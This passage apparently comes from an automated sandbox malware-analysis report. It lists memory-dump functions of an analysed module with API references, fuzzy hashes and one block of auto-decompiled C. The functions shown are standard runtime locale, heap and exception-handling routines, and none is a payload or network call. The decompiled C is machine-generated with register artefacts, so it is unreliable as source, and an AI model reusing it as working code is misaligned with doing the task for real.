                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2299586839-0
                                                                                                                          • Opcode ID: 90ab07b7ba0c57fadd014146bc356914af6d9f79a2b0d5d2e36ad077c535b9d4
                                                                                                                          • Instruction ID: b6ba0a480b527b1988d452962f9d589997338f7d072ec30b88207aea29ae7a18
                                                                                                                          • Opcode Fuzzy Hash: 90ab07b7ba0c57fadd014146bc356914af6d9f79a2b0d5d2e36ad077c535b9d4
                                                                                                                          • Instruction Fuzzy Hash: 06E04F325009A8FBCF122FA1DC04EDE3E1DEF85B61F204411FC1565154DB728921EAD4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E309EB5, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000008,?,00000000,?,?,6E30981B,?,00000022,00000000,00000002,?,?,6E306C7B,00000000,?), ref: 6E309EE2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2299586839-0
                                                                                                                          • Opcode ID: 121fb5e373271debe9f6695319b843930dd100d3de6cebf52d8a473b0ab9483f
                                                                                                                          • Instruction ID: 5a75c93548ccc40da76c7e495801efcbcfa07f45a792a316bbcc697ea3c30f17
                                                                                                                          • Opcode Fuzzy Hash: 121fb5e373271debe9f6695319b843930dd100d3de6cebf52d8a473b0ab9483f
                                                                                                                          • Instruction Fuzzy Hash: C3E08C32500A29EB8F026FD1E8088EE3F2DEF8A7217058404F9080A114CB329C20DBE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E32A2B1, Relevance: .7, Instructions: 668COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: a043ccc47e3fde7a2226f1987a1f6f30a92165c30642a1e99a24607af7041dd9
                                                                                                                          • Instruction ID: a460a7dc98967edde2c54f8d7cf213b65224a25777feb9b1af5d8ceb89066a18
                                                                                                                          • Opcode Fuzzy Hash: a043ccc47e3fde7a2226f1987a1f6f30a92165c30642a1e99a24607af7041dd9
                                                                                                                          • Instruction Fuzzy Hash: 2532AE34A1020A9FCB14CF98C990AEEBBB5EF45304F254579DDC5A7319D732AA46CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E31B597, Relevance: .2, Instructions: 159COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                                          • Instruction ID: 6520f51d38de372135c2b15391c6864ba5045bea9b0517e1cfe1dbe2ac67a814
                                                                                                                          • Opcode Fuzzy Hash: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                                          • Instruction Fuzzy Hash: 9D518171E04219EFDF08CF99C990AEEBBB6EF88314F19805DE805AB305C7359A51CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D21B4, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 71%
                                                                                                                          			E6E2D21B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E2D231B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E2D23D5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E2D22C0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E2D231B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E2D23B7(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                                                          0x6e2d21b8
                                                                                                                          0x6e2d21b9
                                                                                                                          0x6e2d21ba
                                                                                                                          0x6e2d21bd
                                                                                                                          0x6e2d21bf
                                                                                                                          0x6e2d21c2
                                                                                                                          0x6e2d21c3
                                                                                                                          0x6e2d21c5
                                                                                                                          0x6e2d21c6
                                                                                                                          0x6e2d21c7
                                                                                                                          0x6e2d21ca
                                                                                                                          0x6e2d21d4
                                                                                                                          0x6e2d2285
                                                                                                                          0x6e2d228c
                                                                                                                          0x6e2d2295
                                                                                                                          0x6e2d21da
                                                                                                                          0x6e2d21da
                                                                                                                          0x6e2d21e0
                                                                                                                          0x6e2d21e6
                                                                                                                          0x6e2d21e9
                                                                                                                          0x6e2d21ec
                                                                                                                          0x6e2d21f0
                                                                                                                          0x6e2d21f5
                                                                                                                          0x6e2d21fa
                                                                                                                          0x6e2d227a
                                                                                                                          0x00000000
                                                                                                                          0x6e2d21fc
                                                                                                                          0x6e2d21fc
                                                                                                                          0x6e2d2208
                                                                                                                          0x6e2d220a
                                                                                                                          0x6e2d2265
                                                                                                                          0x6e2d2265
                                                                                                                          0x6e2d226b
                                                                                                                          0x00000000
                                                                                                                          0x6e2d220c
                                                                                                                          0x6e2d221b
                                                                                                                          0x6e2d221d
                                                                                                                          0x6e2d221e
                                                                                                                          0x6e2d221f
                                                                                                                          0x6e2d2222
                                                                                                                          0x6e2d2222
                                                                                                                          0x6e2d2224
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2226
                                                                                                                          0x6e2d2226
                                                                                                                          0x6e2d2270
                                                                                                                          0x6e2d2228
                                                                                                                          0x6e2d2228
                                                                                                                          0x6e2d222c
                                                                                                                          0x6e2d2234
                                                                                                                          0x6e2d2239
                                                                                                                          0x6e2d223e
                                                                                                                          0x6e2d224a
                                                                                                                          0x6e2d2252
                                                                                                                          0x6e2d2259
                                                                                                                          0x6e2d225f
                                                                                                                          0x6e2d2263
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2263
                                                                                                                          0x6e2d2226
                                                                                                                          0x6e2d2224
                                                                                                                          0x00000000
                                                                                                                          0x6e2d220a
                                                                                                                          0x6e2d227e
                                                                                                                          0x6e2d227e
                                                                                                                          0x6e2d227e
                                                                                                                          0x6e2d21fa
                                                                                                                          0x6e2d229a
                                                                                                                          0x6e2d22a1

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                          • Instruction ID: 438c0cc961863879b6bfbc07876b5b80b6104fce4f12502c5492238cf87deb83
                                                                                                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                          • Instruction Fuzzy Hash: CF21CB779042099FDB00DFA8DCC49A7B7A6FF49350B058558EE159B245D730F919C7E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E30E8C0, Relevance: .1, Instructions: 76COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                          • Instruction ID: a613bba58fce6bf5bccd438c52f453ab185144769cbbccf8d4baac35bc1f8da5
                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                          • Instruction Fuzzy Hash: AF113D7B341383C7EEC085FFC4B46B7F396EBC622576943BAD0618B658D12BE1459600
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E37DBB5, Relevance: .1, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186488728.000000006E37D000.00000040.00020000.sdmp, Offset: 6E37D000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                          • Instruction ID: 78deb6dc453546c1b3fae316f8ad1afebc6e25a6784d8bd989e8ce46f14326e0
                                                                                                                          • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                          • Instruction Fuzzy Hash: 4711D6733401019FDB54CE99DCD0E9677DAEB892307558065DD04CB315D67AE801CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E37DEAA, Relevance: .1, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186488728.000000006E37D000.00000040.00020000.sdmp, Offset: 6E37D000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                          • Instruction ID: 4e96736f374ce85b0d1b276ed4a23fdfe004789e4ce1c4c062bb244c8e95d778
                                                                                                                          • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                          • Instruction Fuzzy Hash: 4E0126323042418FDB69CF69D994D69B7E8EBD3364B95C07EC44687A19D239E441CD24
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E338861, Relevance: .0, Instructions: 22COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7fd1dc8cc4201bab0dfbcad80c1a42e0146a61ef2c67b76f7307b9c56e3daa6f
                                                                                                                          • Instruction ID: f22e2e59bca7df0487a4e14f4ea22f9997545151e47da55e9e487a5e11d8b7df
                                                                                                                          • Opcode Fuzzy Hash: 7fd1dc8cc4201bab0dfbcad80c1a42e0146a61ef2c67b76f7307b9c56e3daa6f
                                                                                                                          • Instruction Fuzzy Hash: D4E08C32911278EBCB14CBC8C940D9AB3ECEB44B55B254896B511D3180D270DE00CBD0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E306CAF, Relevance: 77.3, APIs: 32, Strings: 12, Instructions: 287COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E306CB6
                                                                                                                          • collate.LIBCPMT ref: 6E306CBF
                                                                                                                            • Part of subcall function 6E3059D8: __EH_prolog3_GS.LIBCMT ref: 6E3059DF
                                                                                                                            • Part of subcall function 6E3059D8: __Getcoll.LIBCPMT ref: 6E305A43
                                                                                                                            • Part of subcall function 6E3059D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E305A5F
                                                                                                                          • __Getcoll.LIBCPMT ref: 6E306D05
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D19
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D2E
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D7F
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EB4
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EC7
                                                                                                                          • int.LIBCPMT ref: 6E306ED4
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EE4
                                                                                                                          • int.LIBCPMT ref: 6E306EF1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F01
                                                                                                                          • int.LIBCPMT ref: 6E306F0E
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F1E
                                                                                                                          • int.LIBCPMT ref: 6E306CDF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • int.LIBCPMT ref: 6E306D42
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D6C
                                                                                                                          • int.LIBCPMT ref: 6E306D97
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306DC5
                                                                                                                          • int.LIBCPMT ref: 6E306DD2
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306DF9
                                                                                                                          • int.LIBCPMT ref: 6E306E06
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306E56
                                                                                                                          • int.LIBCPMT ref: 6E306E63
                                                                                                                          • int.LIBCPMT ref: 6E306F36
                                                                                                                          • numpunct.LIBCPMT ref: 6E306F5D
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F6D
                                                                                                                          • int.LIBCPMT ref: 6E306F7A
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FB1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FC4
                                                                                                                          • int.LIBCPMT ref: 6E306FD1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FE1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                                          • String ID: 8=An$<=An$@=An$D=An$D=An$H=An$H=An$L=An$L=An$P=An$T=An$T=An
                                                                                                                          • API String ID: 2009638416-1366981069
                                                                                                                          • Opcode ID: 68a267592dcc7161e0af48a73dc9e59024d0fa4568c9996fda4162abbeb6e472
                                                                                                                          • Instruction ID: 22c100071f38c969e5c3fd6360353a9a77e72891a3ceea694c84d21490914707
                                                                                                                          • Opcode Fuzzy Hash: 68a267592dcc7161e0af48a73dc9e59024d0fa4568c9996fda4162abbeb6e472
                                                                                                                          • Instruction Fuzzy Hash: C791F6B1D04319AFEB215FF5CC54BBFBAADAF52754F00481DE844AB280EB758941C7A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33B2A4, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 6E33B2E8
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA15
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA27
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA39
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA4B
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA5D
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA6F
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA81
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA93
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAA5
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAB7
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAC9
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CADB
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAED
                                                                                                                          • _free.LIBCMT ref: 6E33B2DD
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33B2FF
                                                                                                                          • _free.LIBCMT ref: 6E33B314
                                                                                                                          • _free.LIBCMT ref: 6E33B31F
                                                                                                                          • _free.LIBCMT ref: 6E33B341
                                                                                                                          • _free.LIBCMT ref: 6E33B354
                                                                                                                          • _free.LIBCMT ref: 6E33B362
                                                                                                                          • _free.LIBCMT ref: 6E33B36D
                                                                                                                          • _free.LIBCMT ref: 6E33B3A5
                                                                                                                          • _free.LIBCMT ref: 6E33B3AC
                                                                                                                          • _free.LIBCMT ref: 6E33B3C9
                                                                                                                          • _free.LIBCMT ref: 6E33B3E1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 161543041-0
                                                                                                                          • Opcode ID: 9f595cf4663ba49c3c27c2617a72f93137eff1310d12a0bfc860585168004362
                                                                                                                          • Instruction ID: 643d77b938cb2e80e64f6ad0a7dcce358491d49f49f3c06f0594ae71bd86d903
                                                                                                                          • Opcode Fuzzy Hash: 9f595cf4663ba49c3c27c2617a72f93137eff1310d12a0bfc860585168004362
                                                                                                                          • Instruction Fuzzy Hash: D8314E31604AA19FEB519BB9E840FDAB3F8AF00364FB44819E094DA159DF31ED54CB10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E305681, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305688
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305692
                                                                                                                          • int.LIBCPMT ref: 6E3056A9
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3056E3
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305703
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305710
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30571D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID: T=An
                                                                                                                          • API String ID: 3920336645-183501617
                                                                                                                          • Opcode ID: af97d9ee79a885e37b4d51e80876e17d01ba37c3b4bf55f91fbbdbc7e59dc5a9
                                                                                                                          • Instruction ID: b88e0c7fdfb887db62a379d231eeeb2d20fc69b82dc71074db70c368b6d25c31
                                                                                                                          • Opcode Fuzzy Hash: af97d9ee79a885e37b4d51e80876e17d01ba37c3b4bf55f91fbbdbc7e59dc5a9
                                                                                                                          • Instruction Fuzzy Hash: E721F37590061DDBCF02DFE4D9047EEBBBABF45718F504909E8506B280CB709941DB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7D9F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7DA6
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7DB0
                                                                                                                          • int.LIBCPMT ref: 6E2F7DC7
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7E01
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7E21
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7E2E
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7E3B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID: x<An
                                                                                                                          • API String ID: 3920336645-3788929408
                                                                                                                          • Opcode ID: f6a17c18c7609e60e5b72a0950a2e08927fa5b03e2f03755c507ef8d172143e7
                                                                                                                          • Instruction ID: e4c38b555e5148da7ca9bee51b1657c5267a73514a24089315a02dc41184577e
                                                                                                                          • Opcode Fuzzy Hash: f6a17c18c7609e60e5b72a0950a2e08927fa5b03e2f03755c507ef8d172143e7
                                                                                                                          • Instruction Fuzzy Hash: 2421D47994011EDBCF01DFE4D911AEEBBBAAF45714F10490AE8506B280DB709D02CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E3054C2, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E3054C9
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3054D3
                                                                                                                          • int.LIBCPMT ref: 6E3054EA
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E30550D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E305524
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305544
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305551
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID: L=An
                                                                                                                          • API String ID: 3376033448-2673704001
                                                                                                                          • Opcode ID: 18e0cfcd1be408711dd7825c5c79e21c7cb9c301a716e3af838d2f8a63873de7
                                                                                                                          • Instruction ID: c934ce03d4ed54ef24108c2da636eeeb9f0121477426b7f36b26a66e0f761f1f
                                                                                                                          • Opcode Fuzzy Hash: 18e0cfcd1be408711dd7825c5c79e21c7cb9c301a716e3af838d2f8a63873de7
                                                                                                                          • Instruction Fuzzy Hash: AB01C07A900519EBCF11DBE8C954AFEB7BBAF45318F150809D8226B280DF70DA46CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E305557, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30555E
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305568
                                                                                                                          • int.LIBCPMT ref: 6E30557F
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E3055A2
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3055B9
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3055D9
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3055E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID: H=An
                                                                                                                          • API String ID: 3376033448-272624406
                                                                                                                          • Opcode ID: 49b858208bebf9cc40ec03e10010d73b544bee83bdea5513b6de6effd32370d6
                                                                                                                          • Instruction ID: 45908b957ccecad6234f632ae943c643a27ae4a2436b8a6ad285787d1aadb37f
                                                                                                                          • Opcode Fuzzy Hash: 49b858208bebf9cc40ec03e10010d73b544bee83bdea5513b6de6effd32370d6
                                                                                                                          • Instruction Fuzzy Hash: 740100B680051DEBCF21DBE4D955AFEB77BAF81328F200809D4116B280DF749A42C790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E30526E, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305275
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E30527F
                                                                                                                          • int.LIBCPMT ref: 6E305296
